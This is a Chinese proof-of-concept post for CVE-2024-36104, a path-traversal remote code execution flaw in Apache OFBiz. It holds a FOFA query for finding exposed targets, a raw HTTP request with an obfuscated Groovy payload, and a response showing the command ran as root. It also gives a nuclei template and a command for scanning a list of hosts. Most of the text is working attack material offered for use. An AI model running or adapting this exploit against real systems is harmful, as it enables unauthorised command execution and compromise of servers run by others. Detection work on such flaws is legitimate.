CVE-2024-36104漏洞复现（附POC）

app="Apache_OFBiz"

POST /webtools/control/forgotPassword/%2e/%2e/ProgramExport HTTP/1.1Host: x.x.x.xUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36 Edg/113.0.1774.35Connection: closeContent-Length: 262Content-Type: application/x-www-form-urlencodeduser-agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15Accept-Encoding: gzipgroovyProgram=u0074u0068u0072u006fu0077u0020u006eu0065u0077u0020u0045u0078u0063u0065u0070u0074u0069u006fu006eu0028u0027u0069u0064u0027u002eu0065u0078u0065u0063u0075u0074u0065u0028u0029u002eu0074u0065u0078u0074u0029u003b

HTTP/1.1 200 OKConnection: closeTransfer-Encoding: chunkedAccess-Control-Allow-Credentials: trueAccess-Control-Allow-Headers: Access-Control-Expose-HeadersAuthorization, content-type,Set-Cookie,CONFIG-KEY,access-control-request-headers,access-control-request-method,accept,origin,authorization,x-requested-with,responseType,observeAccess-Control-Allow-Methods: POST, PUT, GET, OPTIONS, DELETEAccess-Control-Expose-Headers: AuthorizationAccess-Control-Expose-Headers: responseTypeAccess-Control-Expose-Headers: observeContent-Type: text/html;charset=UTF-8Date: Thu, 06 Jun 2024 01:35:42 GMTServer: Apache-Coyote/1.1Set-Cookie: JSESSIONID=32E1AA389DCD8C9DE7695C95E54FD4A3.jvm1; Path=/webtools/; HttpOnlySet-Cookie: OFBiz.Visitor=3139929; Expires=Fri, 06-Jun-2025 01:35:42 GMT; Path=/Vary: Accept-EncodingX-Powered-By: Servlet/3.1 JSP/2.3 (Apache Tomcat/8.0.33 Java/Red Hat, Inc./1.8.0_292-b10)<!DOCTYPE html><html lang="zh-cn" dir="ltr" xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/><title>OFBiz&#x3a; Web&#x5de5;&#x5177;: XML&#x6570;&#x636e;&#x5bfc;&#x51fa;&#x5168;&#x90e8;</title><link rel="shortcut icon" href="/images/shortcut.ico" /><script src="/images/jquery/jquery-1.11.0.min.js" type="text/javascript"></script><script src="/images/jquery/jquery-migrate-1.2.1.js" type="text/javascript"></script><script src="/images/jquery/plugins/fjTimer/jquerytimer-min.js" type="text/javascript"></script><script src="/images/jquery/plugins/validate/jquery.validate.min.js" type="text/javascript"></script><script src="/images/jquery/plugins/jeditable/jquery.jeditable.js" type="text/javascript"></script><script src="/images/jquery/ui/js/jquery-ui-1.10.3.min.js" type="text/javascript"></script><script src="/images/jquery/plugins/jquery.maskedinput-1.3.1.min.js" type="text/javascript"></script><script src="/images/jquery/plugins/datetimepicker/jquery-ui-timepicker-addon.min-1.4.3.js" type="text/javascript"></script><script src="/images/jquery/plugins/asmselect/jquery.asmselect-1.0.4a-beta.js" type="text/javascript"></script><script src="/images/webapp/images/jquery/ui/i18n/jquery.ui.datepicker-en.js" type="text/javascript"></script><script src="/images/webapp/images/jquery/plugins/validate/localization/messages_en.js" type="text/javascript"></script><script src="/images/jquery/ui/i18n/jquery.ui.datepicker-en.js" type="text/javascript"></script><script src="/images/jquery/plugins/datejs/date-en-US.js" type="text/javascript"></script><script src="/images/OpenLayers-2.13.1.js" type="text/javascript"></script><script src="/images/selectall.js" type="text/javascript"></script><script src="/images/fieldlookup.js" type="text/javascript"></script><script src="/images/date/date.format-1.2.3-min.js" type="text/javascript"></script><script src="/images/date/date.timezone-min.js" type="text/javascript"></script><script src="/images/miscAjaxFunctions.js" type="text/javascript"></script><script src="/images/selectMultipleRelatedValues.js" type="text/javascript"></script><script src="/images/util.js" type="text/javascript"></script><script src="/images/date/FromThruDateCheck.js" type="text/javascript"></script><script src="/flatgrey/js/application.js" type="text/javascript"></script><link rel="stylesheet" href="/images/jquery/plugins/asmselect/jquery.asmselect-1.0.4a-beta.css" type="text/css"/><link rel="stylesheet" href="/flatgrey/maincss.css" type="text/css"/><link rel="stylesheet" href="/flatgrey/javascript.css" type="text/css"/></head><body><div id="wait-spinner" style="display:none"><div id="wait-spinner-image"></div></div><div class="page-container"><div class="hidden"><a href="#column-container" title="&#x8df3;&#x8fc7;&#x5bfc;&#x822a;" accesskey="2">&#x8df3;&#x8fc7;&#x5bfc;&#x822a;</a></div><div id="masthead" style="color:#333333"><ul><li class="logo-area" style="margin-top:4px;"><a href="/ecommerce/control/main" target="_blank"><img alt="OFBiz&#x3a; Web&#x5de5;&#x5177;" src="/flatgrey/images/fhwork.png"/></a></li><li class="preference-area" style="color:#333333"><ul><li>&#x6b22;&#x8fce;! <a href="/webtools/control/checkLogin/ProgramExport;jsessionid=32E1AA389DCD8C9DE7695C95E54FD4A3.jvm1" style="color:#333333;">&#x767b;&#x5f55;</a></li></ul></li></ul></div><script type="text/javascript">jQuery(document).ready(function (){jQuery("#nav_right, #nav_right_img").css("cursor", "pointer").click(function(){var offset=jQuery("#nav-main-box").offset();if((offset.left + document.getElementById("nav-main-box").width) < jQuery("#top-box").width()){}else{jQuery("#nav-main-box").animate({left:"-=480px"});}return false;});jQuery("#nav_left, #nav_left_img").css("cursor", "pointer").click(function(){var offset=jQuery("#nav-main-box").offset();if(offset.left > -320){jQuery("#nav-main-box").animate({left:20});}else{jQuery("#nav-main-box").animate({left:"+=480px"});}return false;});});</script><center><div id="content-messages" class=" content-messages eventMessage messages" onclick="document.getElementById('content-messages').parentNode.removeChild(this)"><div class="messagescontent"><div class="hintImg hintFont errorFont"><img src="/images/hintImages/error.png" class="messImg"/>&#x53d1;&#x751f;&#x4e86;&#x4e0b;&#x9762;&#x7684;&#x9519;&#x8bef;：java.lang.Exception: uid=0(root) gid=0(root) groups=0(root)</div></div><div class="clearFloat"></div></div></center><div class="contentarea"><div id="column-container"><div id="content-main-section"><h3>Web&#x5de5;&#x5177;&#x6743;&#x9650;&#x9519;&#x8bef;</h3></div><div class="clear"></div></div></div><div id="footer" style="text-align:center"><p>2024-06-06 09:35<a href="/webtools/control/ListLocales;jsessionid=32E1AA389DCD8C9DE7695C95E54FD4A3.jvm1">zh-cn</a><a href="/webtools/control/ListVisualThemes;jsessionid=32E1AA389DCD8C9DE7695C95E54FD4A3.jvm1">&#x89c6;&#x89c9;&#x98ce;&#x683c;</a></p><p>&#x7248;&#x6743;&#x6240;&#x6709;&copy; 2009-2024 &#x6df1;&#x5733;&#x5e02;&#x98de;&#x534e;&#x8f6f;&#x4ef6;&#x5f00;&#x53d1;&#x6709;&#x9650;&#x516c;&#x53f8;. &#x8fd0;&#x884c;&#x5e73;&#x53f0; <a href="http://www.fhwork.cn" target="_blank">&#x98de;&#x534e;&#x4f9b;&#x5e94;&#x94fe;</a></p></div></div></body></html><div id="fh-help-dialog" title="使用说明" id="helpDiv"><p><div id="help_title"></div></p><div id="help_messages"></div></div><script>var fh_help_dialog ;$(function() {fh_help_dialog = $( "#fh-help-dialog" ).dialog({resizable: true,autoOpen: false,height:520,minWidth:500,modal: true,buttons: {关闭: function() {$( this ).dialog( "close" );}}});});function openFhHelpDialog(moduleRequest){//alert(moduleRequest);var ajaxUrl = '/webtools/control/getFeihuaHelpItemList;jsessionid=32E1AA389DCD8C9DE7695C95E54FD4A3.jvm1';jQuery.ajax({url: ajaxUrl,type: 'POST',data: {"moduleRequest" : moduleRequest},error: function(msg) {alert("An error occurred loading content! : " + msg);},success: function(msgo) {var msgp = eval('(' + msgo + ')');var msg = msgp[0];jQuery('#help_title').text(msg.title);var contens = "";for(var i=0;i<msg.messages.length;i++){var message = msg.messages[i];contens += i+1+"、"+message + "<br/>";}jQuery('#help_messages').html(contens);}});fh_help_dialog.dialog("open");}function openMyShopWebsite(myShopWebsite){var lookupwindowXgh = window.open("http://"+myShopWebsite+"/ecommerce/");lookupwindowXgh.opener = window;lookupwindowXgh.focus();}function openMyManagement(myShopWebsite){var lookupwindowXgh2 = window.open("https://"+myShopWebsite+"/myportal/control/main");lookupwindowXgh2.opener = window;lookupwindowXgh2.focus();}</script>

id: CVE-2024-36104info:  name: Apache-OFBiz存在路径遍历导致RCE漏洞  author: fgz  severity: critical  description: Apache OFBiz是一个电子商务平台，用于构建大中型企业级、跨平台、跨数据库、跨应用服务器的多层、分布式电子商务类应用系统。是美国阿帕奇（Apache）基金会的一套企业资源计划（ERP）系统。该系统提供了一整套基于Java的Web应用程序组件和工具。Apache OFBiz 18.12.14之前版本存在命令执行漏洞，该漏洞源于org.apache.ofbiz.webapp.control.ControlFilter类对路径（请求URL中的特殊字符（如 ；、%2e）限制不当导致攻击者能够绕过后台功能点的过滤器验证，并通过/webtools/control/ProgramExport接口的编程导出功能执行任意Groovy代码获取系统权限。  metadata:    max-request: 1    fofa-query: app="Apache_OFBiz"    verified: truerequests:  - raw:      - |+        POST /webtools/control/forgotPassword/%2e/%2e/ProgramExport HTTP/1.1        Host: {{Hostname}}        user-agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15        Content-Type: application/x-www-form-urlencoded        groovyProgram=u0074u0068u0072u006fu0077u0020u006eu0065u0077u0020u0045u0078u0063u0065u0070u0074u0069u006fu006eu0028u0027u0069u0064u0027u002eu0065u0078u0065u0063u0075u0074u0065u0028u0029u002eu0074u0065u0078u0074u0029u003b    matchers:      - type: dsl        dsl:          - "status_code == 200 && contains(body, 'uid=') && contains(body, 'gid=')"

nuclei.exe -t mypoc/cve/CVE-2024-36104.yaml -l data1.txt